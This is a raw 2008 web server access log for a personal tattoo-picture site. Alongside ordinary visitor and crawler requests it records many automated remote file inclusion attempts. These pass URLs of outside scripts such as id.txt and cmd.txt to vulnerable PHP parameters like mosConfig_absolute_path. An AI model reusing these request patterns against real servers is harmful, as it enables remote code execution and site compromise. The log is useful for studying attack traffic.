71.50.70.58 - - [28/Jul/2008:19:55:12 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:12 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:12 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:12 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:12 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:14 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:14 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:15 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:55:15 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:17 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:17 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:18 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:18 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:18 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:18 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:20 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:20 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:20 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:20 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:20 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
195.42.160.22 - - [28/Jul/2008:19:56:44 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 331 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:19:56:45 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 326 "-""libwww-perl/5.48"
71.50.70.58 - - [28/Jul/2008:19:56:53 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:54 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:54 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
71.50.70.58 - - [28/Jul/2008:19:56:54 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818)"
70.85.201.66 - - [28/Jul/2008:19:57:18 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
70.85.201.66 - - [28/Jul/2008:19:57:24 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.latinamericancongress.com/imag_eventos/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
202.155.5.40 - - [28/Jul/2008:19:57:40 -0500] "GET /logs/access_log.1214092800/cyberfolio/portfolio/msg/view.php?av=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 332 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
202.155.5.40 - - [28/Jul/2008:19:57:40 -0500] "GET /cyberfolio/portfolio/msg/view.php?av=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 305 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
202.155.5.40 - - [28/Jul/2008:19:57:50 -0500] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
67.18.151.242 - - [28/Jul/2008:19:58:06 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
202.155.5.40 - - [28/Jul/2008:19:58:36 -0500] "GET /logs/access_log.1214611200/cyberfolio/portfolio/msg/view.php?av=http://legalref.ru/config/idfx.txt?? HTTP/1.0" 404 332 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
194.85.89.114 - - [28/Jul/2008:19:59:06 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://star.jbsc.ac.kr/technote/config/temp/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
194.85.89.114 - - [28/Jul/2008:19:59:06 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://star.jbsc.ac.kr/technote/config/temp/id.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
194.85.89.114 - - [28/Jul/2008:19:59:07 -0500] "GET //include/admin.lib.inc.php?site_path=http://star.jbsc.ac.kr/technote/config/temp/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
194.85.89.114 - - [28/Jul/2008:19:59:07 -0500] "GET //include/admin.lib.inc.php?site_path=http://star.jbsc.ac.kr/technote/config/temp/id.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
75.125.40.130 - - [28/Jul/2008:20:01:39 -0500] "GET /logs/access_log.1212883200//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:01:39 -0500] "GET //?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:01:40 -0500] "GET /logs//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 93166 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:01:47 -0500] "GET /logs/access_log.1212883200//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:01:47 -0500] "GET //?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:01:47 -0500] "GET /logs//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 93166 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:02:01 -0500] "GET /logs/access_log.1212883200//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:02:01 -0500] "GET //?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:02:01 -0500] "GET /logs/access_log.1212883200//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:02:01 -0500] "GET /logs//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 93166 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:02:01 -0500] "GET //?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.811"
75.125.40.130 - - [28/Jul/2008:20:02:02 -0500] "GET /logs//?mosConfig_absolute_path=http://www.cedhchihuahua.org.mx/components/com_poll/knowledge/id.txt?? HTTP/1.1" 200 93166 "-""libwww-perl/5.811"
91.186.15.66 - - [28/Jul/2008:20:03:47 -0500] "GET /logs//newspublish/include.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 313 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
91.186.15.66 - - [28/Jul/2008:20:03:47 -0500] "GET //newspublish/include.php?path[docroot]=http://www.almeranissan.ru/administrator/components/com_autobb/mambo?? HTTP/1.1" 404 308 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
194.201.253.2 - - [28/Jul/2008:20:04:00 -0500] "GET /logs/access_log.1212883200//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
210.245.87.117 - - [28/Jul/2008:20:04:16 -0500] "GET /logs/access_log.1214438400/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:04:17 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:04:19 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
209.97.201.148 - - [28/Jul/2008:20:05:25 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:20:05:25 -0500] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
210.245.87.117 - - [28/Jul/2008:20:06:20 -0500] "GET /logs/access_log.1214438400/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:06:21 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:06:21 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
59.125.211.84 - - [28/Jul/2008:20:08:56 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
59.125.211.84 - - [28/Jul/2008:20:08:56 -0500] "GET /e404.php?DOCUMENT_ROOT=http://emuleapocalypse.nuxit.net/site//skins/advanced/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
64.26.63.17 - - [28/Jul/2008:20:10:37 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 360 "-""libwww-perl/5.803"
64.26.63.17 - - [28/Jul/2008:20:10:37 -0500] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
205.234.232.195 - - [28/Jul/2008:20:13:45 -0500] "GET /logs/access_log.1214438400//atom.php5?page=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.812"
205.234.232.195 - - [28/Jul/2008:20:13:45 -0500] "GET //atom.php5?page=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
205.234.232.195 - - [28/Jul/2008:20:13:45 -0500] "GET /logs//atom.php5?page=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
202.30.194.70 - - [28/Jul/2008:20:14:37 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 356 "-""Mozilla/3.0 (OS/2; U)"
202.30.194.70 - - [28/Jul/2008:20:14:37 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 361 "-""Mozilla/3.0 (OS/2; U)"
202.30.194.70 - - [28/Jul/2008:20:14:37 -0500] "GET /logs/access_log.1212278400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/3.0 (OS/2; U)"
209.97.201.148 - - [28/Jul/2008:20:16:29 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:20:16:29 -0500] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:20:21:19 -0500] "GET /logs/access_log.1214438400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 382 "-""libwww-perl/5.79"
195.42.160.22 - - [28/Jul/2008:20:22:04 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 331 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:20:22:04 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 326 "-""libwww-perl/5.48"
209.97.201.148 - - [28/Jul/2008:20:23:00 -0500] "GET /logs/access_log.1212883200/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 382 "-""libwww-perl/5.79"
64.26.63.17 - - [28/Jul/2008:20:23:02 -0500] "GET /logs/access_log.1212883200/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 382 "-""libwww-perl/5.803"
209.97.201.148 - - [28/Jul/2008:20:26:24 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:20:26:25 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
217.20.138.101 - - [28/Jul/2008:20:26:43 -0500] "GET /logs//php/allmylinks//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
217.20.138.101 - - [28/Jul/2008:20:26:43 -0500] "GET //php/allmylinks//include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
194.201.253.2 - - [28/Jul/2008:20:28:27 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/special.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:20:28:27 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/special.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:20:28:28 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/special.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:20:28:29 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://anakdompu.by.ru/special/special.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.810"
116.21.117.18 - - [28/Jul/2008:20:30:00 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)"
67.97.75.162 - - [28/Jul/2008:20:32:18 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://o.webring.com/hub?ring=tattoos""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
67.97.75.162 - - [28/Jul/2008:20:32:18 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
67.97.75.162 - - [28/Jul/2008:20:32:19 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)"
205.234.198.225 - - [28/Jul/2008:20:34:08 -0500] "GET /logs/access_log.1212278400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.810"
205.234.198.225 - - [28/Jul/2008:20:34:08 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
205.234.198.225 - - [28/Jul/2008:20:34:08 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
195.42.160.22 - - [28/Jul/2008:20:36:23 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 315 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:20:36:23 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 310 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:20:36:27 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 315 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:20:36:27 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom%5Bjm_dir%5D=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 310 "-""libwww-perl/5.48"
195.5.163.212 - - [28/Jul/2008:20:37:18 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
195.5.163.212 - - [28/Jul/2008:20:37:19 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/elmaningrum/test.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
205.234.198.225 - - [28/Jul/2008:20:38:16 -0500] "GET /logs/access_log.1214784000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.810"
205.234.198.225 - - [28/Jul/2008:20:39:38 -0500] "GET /logs/access_log.1213747200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.alight.pe.kr/zboard/latest_skin/id.txt?? HTTP/1.1" 404 374 "-""libwww-perl/5.810"
205.234.232.195 - - [28/Jul/2008:20:41:59 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
205.234.232.195 - - [28/Jul/2008:20:41:59 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.sfaguild.net/Calendar//includes/did.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.812"
74.6.19.242 - - [28/Jul/2008:20:46:40 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.46 - - [28/Jul/2008:20:46:40 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.252 - - [28/Jul/2008:20:52:37 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [28/Jul/2008:20:54:54 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.18.252 - - [28/Jul/2008:20:56:11 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.0" 200 3085 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
210.245.87.117 - - [28/Jul/2008:20:58:23 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:58:24 -0500] "GET //appserv/main.php?appserv_root=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
72.243.169.10 - - [28/Jul/2008:20:58:51 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
72.243.169.10 - - [28/Jul/2008:20:58:51 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:59:48 -0500] "GET /logs/classes.php?DOCUMENT_ROOT==http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:59:49 -0500] "GET /classes.php?DOCUMENT_ROOT==http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:59:53 -0500] "GET /logs/classes/core/language.php?DOCUMENT_ROOT==http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:20:59:53 -0500] "GET /classes/core/language.php?DOCUMENT_ROOT==http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:21:00:02 -0500] "GET /logs/classes/core/language.php?rootdir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:21:00:02 -0500] "GET /classes/core/language.php?rootdir=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
